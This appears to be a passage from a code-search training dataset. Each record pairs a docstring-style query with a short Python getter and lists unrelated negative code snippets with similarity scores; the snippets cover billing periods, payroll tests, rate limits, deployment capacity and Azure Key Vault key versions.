int(self.exp_month),\n calendar.monthrange(int(self.exp_year), int(self.exp_month))[1],\n 23, 59, 59)", "def returnDepositsWithdrawals(self,\n start=datetime.now() - timedelta(days=1),\n end=datetime.now()):\n pass", "def pnl(qbo_session, period = \"YEARLY\", start_date=\"first\", end_date=\"last\",\n **kwargs):\n\n pnl_account_types = [\n \n \"Income\", \"Other Income\",\n \"Expense\", \"Other Expense\", \"Cost of Goods Sold\"\n \n ]\n\n \n\n # go through the accounts, collecting a list of those that are \n # pnl accounts\n\n relevant_accounts = []\n\n coa = qbo_session.chart_of_accounts()\n\n AccountType_i = coa[0].index(\"AccountType\")\n fqa_i = coa[0].index(\"FullyQualifiedName\")\n\n for a in coa:\n\n AccountType = a[AccountType_i]\n\n if AccountType in pnl_account_types:\n\n relevant_accounts.append(a[fqa_i])\n \n # now collect the ledger_lines that are even relevant to the time\n # period and pnl accounts (and we'll handle presentation last)\n\n relevant_activity = {} #{account:[relevant lines]}\n\n all_ledger_lines = qbo_session.ledger_lines(None, None, None, True,\n **kwargs)\n\n headers = all_ledger_lines[0]\n\n account_i = headers.index(\"account\") \n amount_i = headers.index(\"amount\")\n date_i = headers.index(\"TxnDate\")\n \n earliest_date = datetime(2100,1,1)\n latest_date = datetime(1900,1,1)\n\n for line in all_ledger_lines[1:]:\n\n account = line[account_i]\n line_date = line[date_i]\n\n #first apply the date filter!\n if not start_date == \"first\" and line_date < start_date:\n continue\n \n if not end_date == \"last\" and line_date > end_date:\n continue\n \n #if it's made the cut, we can update the report date bounds\n earliest_date = min(line_date,earliest_date)\n latest_date = max(line_date,latest_date)\n\n #then apply the account filter!\n\n if not account in relevant_activity:\n #then let's confirm that its account type is a pnl one\n \n if not account in relevant_accounts:\n \n continue\n\n else:\n relevant_activity[account] = []\n\n relevant_activity[account].append(line)\n\n #now let's do presentation\n #TODO -- incorporate pandas tables...do only minimal work on it until then\n\n pnl_lines = []\n\n if period == \"YEARLY\":\n\n report_start_date = datetime(earliest_date.year,1,1)\n report_end_date = datetime(latest_date.year,12,31)\n\n period_start_dates = list(rrule(YEARLY, bymonth=1, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonth=12, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date))\n\n elif period == \"MONTHLY\":\n\n report_start_date = datetime(earliest_date.year,\n earliest_date.month,\n 1)\n report_end_date = datetime(latest_date.year,\n latest_date.month,\n calendar.monthrange(latest_date.year,\n latest_date.month)[1])\n\n period_start_dates = list(rrule(MONTHLY, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date)) \n\n header_1 = [\"\", \"Period Start -->\"] + period_start_dates\n header_2 = [\"Account\", \"Period End -->\"] + period_end_dates\n\n pnl_lines.append(header_1)\n pnl_lines.append(header_2)\n\n \"\"\"Clearly, there's a way to do this with only one pass of the data...\n let's get that right in the first re-write...probably with pandas\"\"\"\n\n #now let's fill up the pnl_lines with what we know to be the relevant data\n #for now, we'll rely on the knowledge that the data is coming to us in\n #date order, but that should be fixed too...\n\n for account in relevant_activity:\n\n account_row = [account, \"\"] #one value per period \n\n current_period_index = 0 #primitive counter, yes!\n this_period_total = 0 #this will be this period's total\n\n for line in relevant_activity[account]:\n \n line_amount = line[amount_i]\n line_date = line[date_i] \n\n if line_date > period_end_dates[current_period_index]:\n\n account_row.append(this_period_total)\n this_period_total = line_amount\n current_period_index +=1\n\n else:\n \n this_period_total = round(this_period_total +\n line_amount, 2)\n\n \"\"\"super sloppy...\"\"\"\n account_row.append(this_period_total) #for the last period\n current_period_index +=1\n\n while current_period_index < len(period_end_dates):\n account_row.append(0)\n current_period_index +=1\n\n pnl_lines.append(account_row)\n\n return pnl_lines", "def test_list_grading_periods_accounts(self):\r\n account_id = None # Change me!!\r\n\r\n r = self.client.list_grading_periods_accounts(account_id)", "def get_deadline(self):\n min_time = self.introduction_time or 0\n return min_time + self.time_slot[0] * self.__period", "def compute_periodpayoff(self):\n logger.debug(u\"{} Period Payoff\".format(self.joueur))\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff = 0\n\n # cumulative payoff since the first period\n if self.currentperiod.EXPERIENCE_NOM_COURT_period < 2:\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n else: \n previousperiod = self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period - 1]\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n previousperiod.EXPERIENCE_NOM_COURT_cumulativepayoff + \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n\n # we store the period in the self.periodes dictionnary\n self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period] = self.currentperiod\n\n logger.debug(u\"{} Period Payoff {}\".format(\n self.joueur,\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff))", "def test_finalize_period_overtime(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('360.00') + Decimal('450.00'),\n employee_payment.earnings)", "def deadline(self):\n\n if self.service and self.service.solution_time:\n return self.created + \\\n timedelta(hours=self.service.solution_time) - \\\n timedelta(seconds=self._time_on_hold)\n else:\n return None", "def billing_period(self) -> Optional[str]:\n return pulumi.get(self, \"billing_period\")", "def payment_cycle(self) -> Optional[pulumi.Input['GoogleCloudChannelV1PeriodArgs']]:\n return pulumi.get(self, \"payment_cycle\")", "def test_finalize_and_open_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period2.id})\n self.client.force_login(self.test_user_employer)\n # change from OPEN to FINALIZE\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 1)\n # change from FINALIZE to OPEN\n response = self.client.put(url, data={'status': 'OPEN'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'OPEN', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty)" ]
[ "0.6236221", "0.556296", "0.5546404", "0.5526741", "0.52279395", "0.5222263", "0.5204489", "0.51837915", "0.5149062", "0.5121727", "0.5081491", "0.5066678", "0.50160015", "0.5004779", "0.49921027", "0.49675107", "0.49551263", "0.4941851", "0.49270973", "0.49227467", "0.4918205", "0.4911476", "0.49099314", "0.49072093", "0.48913255", "0.48905048", "0.48638746", "0.48467177", "0.48088193", "0.48062244" ]
0.5595547
1
The call rate limit Cognitive Services account.
def call_rate_limit(self) -> 'outputs.CallRateLimitResponse': return pulumi.get(self, "call_rate_limit")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_rate_limit(self):\n resp = self._session.get(self.API_ROOT + \"/rate_limit\")\n log.info(resp.text)", "def ctx(self):\n return RateLimitContextBase()", "def get_rate_limit(client):\n query = '''query {\n rateLimit {\n limit\n remaining\n resetAt\n }\n }'''\n response = client.execute(query)\n json_response = json.loads(response)\n return json_response['data']['rateLimit']", "def _get_next_limit(self):\n return self.__quota", "def get_request_limit(self, access_token):\n url = \"{0}/rate_limit?access_token={1}\"\n response = requests.get(url.format(self.ROOT_API_URL, access_token))\n data = response.json()\n return data['resources']['core'].get(\"remaining\")", "def test_limits_are_per_account(self):\n url = 'Participant'\n\n # Hit the rate limit for the default service account for the test\n self._reach_rate_limit(url=url)\n\n # Make another request with a different service account, expecting it to work\n with mock.patch('rdr_service.app_util.config.LOCAL_AUTH_USER', '[email protected]'):\n self.send_get(url, expected_status=200)", "def limit(self):\n return self._owner.plan", "def current_rate(entity, limit, duration):\n\n key = \"ratelimit:{}:{}\".format(int(time.time() / duration), entity)\n value = memcache.incr(key, initial_value=0)\n if value > limit:\n logging.info(\n \"RateLimitDenied({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n else:\n logging.info(\n \"RateLimitAllowed({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n return value", "def limit(self):\n if self._limit:\n return self._limit\n else: # no custom limit, go with the default\n return PublicAppPlan", "def get_view_rate_limit():\n return getattr(g, '_view_rate_limit', None)", "def get_account(self, account):\n \n pass", "def get_current_rate(self):\n pass", "async def rate_limit(self, ctx):\n await ctx.send(\"We have found that the approximate rate limit is 30-40 requests per second. Staying \"\n \"below this should be safe.\")", "def rate_limit_percentage(self) -> Optional[float]:\n return pulumi.get(self, \"rate_limit_percentage\")", "def rate(self):\n return self.brate / FAC", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def get_account_limits(self, receive_window: Optional[int] = None):\n api_params = {\n \"timestamp\": get_current_time_milliseconds()\n }\n\n if receive_window is not None:\n api_params['receiveWindow'] = receive_window\n\n return self.request.get(path='/account/limits', params=api_params)", "def account_id():\n return client.get_caller_identity()['Account']", "def user_get_rate_limit():\n login = demisto.getArg('login')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limit = {\n 'SubmissionWaitSeconds': demisto.get(r, 'data.user.submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(r, 'data.user.submissions-available')\n }\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limit},\n 'HumanReadable': tableToMarkdown('ThreatGrid - User Rate Limit', [rate_limit], [\n 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def get_limit(self):\n return self.limit", "def charge_limit(self, limit=None):\n if limit is None:\n done, data = self._request('GH')\n if done:\n return int(data[0])\n else:\n if self._request('SH', str(int(limit)))[0]:\n return limit\n\n raise EvseError", "def get_limit(self, request, tenant_id):\n request.setResponseCode(200)\n return json.dumps(get_limit())", "def account(self, acct):\n aMgr = self.acctManager\n if len(aMgr.accounts) <= acct:\n raise Exception(\"requested unknown account number %i\" % acct)\n return aMgr.account(acct)", "def get_quota(self):\n raise NotImplementedError", "def organization_get_rate_limit():\n login = demisto.getArg('adminLogin')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limits = [\n {\n 'Minutes': demisto.get(rate_limit, 'minutes'),\n 'Samples': demisto.get(rate_limit, 'samples'),\n 'SubmissionWaitSeconds': demisto.get(rate_limit, 'submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(rate_limit, 'submissions-available')\n }\n for rate_limit in demisto.get(r, 'data.organization.submission-rate-limit')\n ]\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limits},\n 'HumanReadable': tableToMarkdown('ThreatGrid - Organization Rate Limit', rate_limits, [\n 'Minutes', 'Samples', 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def calculate(self, limit):\n pass", "def calculate(self, limit):\r\n pass", "def get_account(self):\n return self._account", "def get_account(self):\n return self._account", "def get_limit(self):\n return self._limit" ]
[ "0.6358268", "0.6162561", "0.60568434", "0.5990054", "0.5918794", "0.58661646", "0.573936", "0.57365024", "0.5668265", "0.5640884", "0.56161267", "0.5614316", "0.5562859", "0.5551392", "0.5523943", "0.5515391", "0.54717577", "0.54716563", "0.5464131", "0.5456545", "0.54448587", "0.5427943", "0.54169154", "0.53732604", "0.53491294", "0.5347658", "0.533205", "0.53172153", "0.53172153", "0.5316155" ]
0.73106307
0
The call rate limit Cognitive Services account.
def call_rate_limit(self) -> 'outputs.CallRateLimitResponse': return pulumi.get(self, "call_rate_limit")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_rate_limit(self):\n resp = self._session.get(self.API_ROOT + \"/rate_limit\")\n log.info(resp.text)", "def ctx(self):\n return RateLimitContextBase()", "def get_rate_limit(client):\n query = '''query {\n rateLimit {\n limit\n remaining\n resetAt\n }\n }'''\n response = client.execute(query)\n json_response = json.loads(response)\n return json_response['data']['rateLimit']", "def _get_next_limit(self):\n return self.__quota", "def get_request_limit(self, access_token):\n url = \"{0}/rate_limit?access_token={1}\"\n response = requests.get(url.format(self.ROOT_API_URL, access_token))\n data = response.json()\n return data['resources']['core'].get(\"remaining\")", "def test_limits_are_per_account(self):\n url = 'Participant'\n\n # Hit the rate limit for the default service account for the test\n self._reach_rate_limit(url=url)\n\n # Make another request with a different service account, expecting it to work\n with mock.patch('rdr_service.app_util.config.LOCAL_AUTH_USER', '[email protected]'):\n self.send_get(url, expected_status=200)", "def limit(self):\n return self._owner.plan", "def current_rate(entity, limit, duration):\n\n key = \"ratelimit:{}:{}\".format(int(time.time() / duration), entity)\n value = memcache.incr(key, initial_value=0)\n if value > limit:\n logging.info(\n \"RateLimitDenied({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n else:\n logging.info(\n \"RateLimitAllowed({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n return value", "def limit(self):\n if self._limit:\n return self._limit\n else: # no custom limit, go with the default\n return PublicAppPlan", "def get_view_rate_limit():\n return getattr(g, '_view_rate_limit', None)", "def get_account(self, account):\n \n pass", "def get_current_rate(self):\n pass", "async def rate_limit(self, ctx):\n await ctx.send(\"We have found that the approximate rate limit is 30-40 requests per second. Staying \"\n \"below this should be safe.\")", "def rate_limit_percentage(self) -> Optional[float]:\n return pulumi.get(self, \"rate_limit_percentage\")", "def rate(self):\n return self.brate / FAC", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def get_account_limits(self, receive_window: Optional[int] = None):\n api_params = {\n \"timestamp\": get_current_time_milliseconds()\n }\n\n if receive_window is not None:\n api_params['receiveWindow'] = receive_window\n\n return self.request.get(path='/account/limits', params=api_params)", "def account_id():\n return client.get_caller_identity()['Account']", "def user_get_rate_limit():\n login = demisto.getArg('login')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limit = {\n 'SubmissionWaitSeconds': demisto.get(r, 'data.user.submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(r, 'data.user.submissions-available')\n }\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limit},\n 'HumanReadable': tableToMarkdown('ThreatGrid - User Rate Limit', [rate_limit], [\n 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def get_limit(self):\n return self.limit", "def charge_limit(self, limit=None):\n if limit is None:\n done, data = self._request('GH')\n if done:\n return int(data[0])\n else:\n if self._request('SH', str(int(limit)))[0]:\n return limit\n\n raise EvseError", "def get_limit(self, request, tenant_id):\n request.setResponseCode(200)\n return json.dumps(get_limit())", "def account(self, acct):\n aMgr = self.acctManager\n if len(aMgr.accounts) <= acct:\n raise Exception(\"requested unknown account number %i\" % acct)\n return aMgr.account(acct)", "def get_quota(self):\n raise NotImplementedError", "def organization_get_rate_limit():\n login = demisto.getArg('adminLogin')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limits = [\n {\n 'Minutes': demisto.get(rate_limit, 'minutes'),\n 'Samples': demisto.get(rate_limit, 'samples'),\n 'SubmissionWaitSeconds': demisto.get(rate_limit, 'submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(rate_limit, 'submissions-available')\n }\n for rate_limit in demisto.get(r, 'data.organization.submission-rate-limit')\n ]\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limits},\n 'HumanReadable': tableToMarkdown('ThreatGrid - Organization Rate Limit', rate_limits, [\n 'Minutes', 'Samples', 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def calculate(self, limit):\n pass", "def calculate(self, limit):\r\n pass", "def get_account(self):\n return self._account", "def get_account(self):\n return self._account", "def get_limit(self):\n return self._limit" ]
[ "0.6358268", "0.6162561", "0.60568434", "0.5990054", "0.5918794", "0.58661646", "0.573936", "0.57365024", "0.5668265", "0.5640884", "0.56161267", "0.5614316", "0.5562859", "0.5551392", "0.5523943", "0.5515391", "0.54717577", "0.54716563", "0.5464131", "0.5456545", "0.54448587", "0.5427943", "0.54169154", "0.53732604", "0.53491294", "0.5347658", "0.533205", "0.53172153", "0.53172153", "0.5316155" ]
0.73106307
1
Deployment model version upgrade option.
def version_upgrade_option(self) -> Optional[str]: return pulumi.get(self, "version_upgrade_option")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def upgrade(self, old_version, new_version):\n pass", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def version(self, newVersion=None):\n pass", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def do_create_version(**kwargs):\n version_params = {\n \"name\": kwargs['dag_run'].conf.get('model_version'),\n \"description\": 'Version 1',\n \"runtimeVersion\": kwargs['dag_run'].conf.get('tf_version'),\n \"deploymentUri\": 'gs://{}/{}'.format(COMPOSER_BUCKET_NAME, PREFIX_FINAL_MODEL)\n }\n\n ti = kwargs['ti']\n\n mle = MLEngineHook()\n\n model_name = kwargs['dag_run'].conf.get('model_name')\n model_versions = ti.xcom_pull(key='model_versions', task_ids='list_versions')\n\n version_path = 'projects/{}/models/{}/versions/{}'.format(PROJECT,\n model_name,\n version_params['name'])\n\n if version_path in [v['name'] for v in model_versions]:\n logging.info(\"Delete previously version of the model to overwrite.\")\n mle.delete_version(PROJECT, model_name, version_params['name'])\n\n mle.create_version(PROJECT, model_name, version_params)", "def upgrade(self) -> Optional[pulumi.Input['UpgradeNoteArgs']]:\n return pulumi.get(self, \"upgrade\")", "def upgrade(self):", "def upgrade(self):", "def minor_version_auto_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"minor_version_auto_upgrade\")", "def maybe_update_application_version(self, value):\n if (\n value\n and value.command_class == COMMAND_CLASS_VERSION\n and value.label == \"Application Version\"\n ):\n self._application_version = value.data", "def test_upgrade_opt(self):\n with testing_utils.tempdir() as tmp:\n modfn = os.path.join(tmp, 'model')\n with open(modfn, 'w') as f:\n f.write('Test.')\n optfn = modfn + '.opt'\n base_opt = {\n 'model': 'tests.test_params:_ExampleUpgradeOptAgent',\n 'dict_file': modfn + '.dict',\n 'model_file': modfn,\n }\n with open(optfn, 'w') as f:\n json.dump(base_opt, f)\n\n pp = ParlaiParser(True, True)\n opt = pp.parse_args(['--model-file', modfn])\n agents.create_agent(opt)", "def downgrade():\n raise NotImplementedError(\"Downgrade is not supported\")", "def downgrade():\n raise NotImplementedError(\"Downgrade is not supported\")", "def downgrade():\n raise NotImplementedError(\"Downgrade is not supported\")", "def _update_version(self) -> None:\n # Implement in child class.\n raise NotImplementedError", "def agent_upgrade(self) -> Optional[pulumi.Input['AgentUpgradeArgs']]:\n return pulumi.get(self, \"agent_upgrade\")", "def change_version(new_version):\n global __model\n __model = __ITU1511(new_version)\n utils.memory.clear()", "def downgrade(self, version):\n return NotImplemented", "def AddMaintenanceVersion(parser):\n parser.add_argument(\n '--maintenance-version',\n required=False,\n help='The desired maintenance version of the instance.',\n )", "def full_upgrade(self):\n return self.upgrade(\"full-upgrade\")", "def switch_to_version(self, version):\n self.current_version = version\n self.save()", "def test_upgrade_with_auto_upgrade_latest_engine_enabled():", "def vet_upgrade_path(args):\n flavor = get_upgrade_flavour()\n env_version_override = os.getenv('LEAPP_DEVEL_TARGET_RELEASE')\n if env_version_override:\n check_version(env_version_override)\n return (env_version_override, flavor)\n target_release = args.target or get_target_version(flavor)\n supported_target_versions = get_supported_target_versions(flavor)\n if target_release not in supported_target_versions:\n raise CommandError(\n \"Upgrade to {to} for {flavor} upgrade path is not supported, possible choices are {choices}\".format(\n to=target_release,\n flavor=flavor,\n choices=','.join(supported_target_versions)))\n return (target_release, flavor)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def ongeza(self, type_):\n switch = {\n 'm': semver.bump_major,\n 'n': semver.bump_minor,\n 'p': semver.bump_patch,\n 'major': semver.bump_major,\n 'minor': semver.bump_minor,\n 'patch': semver.bump_patch}\n\n new_version = switch.get(type_)(self.version)\n\n if new_version in set(self.versions):\n self.logger.error('version `%s` already present', new_version)\n new_version = None\n\n return new_version", "def upgrade_options(self) -> Optional[pulumi.Input['AutoUpgradeOptionsArgs']]:\n return pulumi.get(self, \"upgrade_options\")" ]
[ "0.6301088", "0.6108278", "0.6108278", "0.6108278", "0.6108278", "0.6100564", "0.60524964", "0.60524964", "0.60400146", "0.6026032", "0.60177636", "0.60177636", "0.5922572", "0.5913727", "0.58997905", "0.5865239", "0.5865239", "0.5865239", "0.579891", "0.578187", "0.5762119", "0.5743691", "0.57334155", "0.57177436", "0.57038504", "0.5637413", "0.56245047", "0.5614868", "0.56117666", "0.5593066" ]
0.6563416
0
Deployment active capacity. This value might be different from `capacity` if customer recently updated `capacity`.
def active_capacity(self) -> int: return pulumi.get(self, "active_capacity")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self):\n return self._capacity", "def capacity(self):\n return self._capacity", "def capacity(self):\n return self._cap", "def desired_capacity(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"desired_capacity\")", "def capacity(self) -> Capacity:\n raw = self._call('GET', 'capacity')\n return Capacity.parse_raw(raw)", "def capacity(self):\n return str(int(self._properties.get('capacity')) * 1073741824)", "def capacity_gb(self) -> str:\n return pulumi.get(self, \"capacity_gb\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"capacity\")", "def current_capacity(self, capacity=None):\n if capacity:\n if self._request('SC', str(capacity))[0]:\n return capacity\n else:\n done, data = self._request('GE')\n if done:\n return int(data[0])\n\n raise EvseError", "def get_capacity_var(self):\n return self._capacity_var", "def capacity(self) -> typing.Optional[str]:\n value = self._properties.get(\"capacity\")\n return f\"{value}\" if value is not None else None", "def capacity(self):\n raise NotImplementedError()", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def get_capacity_param(self):\n intr = self.get_interaction()\n return intr.get_capacity(None, None, None, None, raw=True)", "def get_heap_cap(self):\r\n return self.capacity", "def minimum_health_capacity(self):\n return self._minimum_health_capacity", "def capacity(self, value: typing.Union[str, int, None]):\n self._properties[\"capacity\"] = _types.integer_or_string(value)", "def capacity(self):\n capacity = {}\n resources = self.nodes[0].capacity.keys()\n for r in resources:\n values = [n.capacity[r] for n in self.nodes]\n capacity[r] = mean(values) if len(values) > 0 else 0.0\n return capacity", "def get_capacity_var(self):\n return self.get_interaction().get_capacity_var()" ]
[ "0.7532596", "0.7532596", "0.7532596", "0.7532596", "0.7492223", "0.745867", "0.7449016", "0.7422382", "0.7390689", "0.7366575", "0.72826654", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.7257428", "0.72303516", "0.7183032", "0.6952233", "0.69227135", "0.6895933", "0.684459", "0.6841447", "0.682207", "0.6767818", "0.67603135", "0.6753784" ]
0.84809434
0
Version of the Key from KeyVault
def key_version(self) -> Optional[str]: return pulumi.get(self, "key_version")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def version_template(self) -> pulumi.Output['outputs.CryptoKeyVersionTemplateResponse']:\n return pulumi.get(self, \"version_template\")", "def get_key_request(self, vault_name: str, key_name: str, key_version: str) -> dict[str, Any]:\n\n url = f'https://{vault_name}{self.azure_cloud.suffixes.keyvault_dns}/keys/{key_name}'\n if key_version:\n url = url + f'/{key_version}'\n response = self.http_request(\n 'GET', full_url=url, resource=self.get_vault_resource())\n\n return response", "def my_verkey(self) -> str:\n\n return self._my_verkey", "def verkey(self) -> str:\n\n return self._verkey", "def get_key_command(client: KeyVaultClient, args: dict[str, Any]) -> CommandResults:\n vault_name = args['vault_name']\n key_name = args['key_name']\n key_version = args.get('key_version', '')\n\n response = client.get_key_request(vault_name, key_name, key_version)\n cloned_response = copy.deepcopy(response)\n outputs = copy.deepcopy(response)\n outputs['attributes'] = convert_time_attributes_to_iso(outputs['attributes'])\n outputs['key_vault_name'] = vault_name\n\n readable_key_info = convert_key_info_to_readable(cloned_response['key'])\n readable_attrib = convert_attributes_to_readable(cloned_response['attributes'])\n\n readable_output = tableToMarkdown(f'{key_name} Information',\n {**readable_key_info, **readable_attrib},\n ['key_id', 'enabled', 'json_web_key_type', 'key_operations', 'create_time',\n 'update_time',\n 'expiry_time'],\n removeNull=True,\n headerTransform=string_to_table_header)\n\n command_results = CommandResults(\n outputs_prefix='AzureKeyVault.Key',\n outputs_key_field='kid',\n outputs=outputs,\n raw_response=response,\n readable_output=readable_output,\n ignore_auto_extract=True\n )\n\n return command_results", "def get_version_key(self, version):\n if self._generic_only:\n return GENERIC_VERSION\n else:\n self.check_version_exists(version)\n return version", "def GetKey(self, version_number):\n return self.dict[str(version_number)]", "def get_version(self, extra=None):\n\n if extra:\n key = self._get_extra_key(extra)\n else:\n key = self.key\n\n v = self._get_cache(key).get(key)\n if v == None:\n v = self._increment_version(extra=extra)\n\n return \"%s.%s\" % (key, v)", "def GetKeyVersionForSigning(self, client_key_version):\n if self.rotate_keys_automatically and client_key_version is not None:\n # Return the incremented version, which means that the key should be\n # rotated.\n return client_key_version + 1\n # Return the version that is specified by the config, defaulting to using\n # the very first key. Note that incrementing here is done due to conversion\n # between indices in the keys list and the key versions transmitted to the\n # client (where the latter have to be positive according to the policy\n # protocol definition).\n return self.GetPolicies().get('current_key_index', 0) + 1", "def key_vault_id(self) -> str:\n return pulumi.get(self, \"key_vault_id\")", "def version_template(self) -> Optional[pulumi.Input['CryptoKeyVersionTemplateArgs']]:\n return pulumi.get(self, \"version_template\")", "def kms_key_version_name(self) -> str:\n return pulumi.get(self, \"kms_key_version_name\")", "def key_vault_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"key_vault_id\")", "def their_verkey(self) -> str:\n\n return self._their_verkey", "def snapshot_encryption_key(self) -> 'outputs.CustomerEncryptionKeyResponse':\n return pulumi.get(self, \"snapshot_encryption_key\")", "def primary(self) -> pulumi.Output['outputs.CryptoKeyVersionResponse']:\n return pulumi.get(self, \"primary\")", "def GetKeyByVersion(self, key_version):\n # Convert the policy key version, which has to be positive according 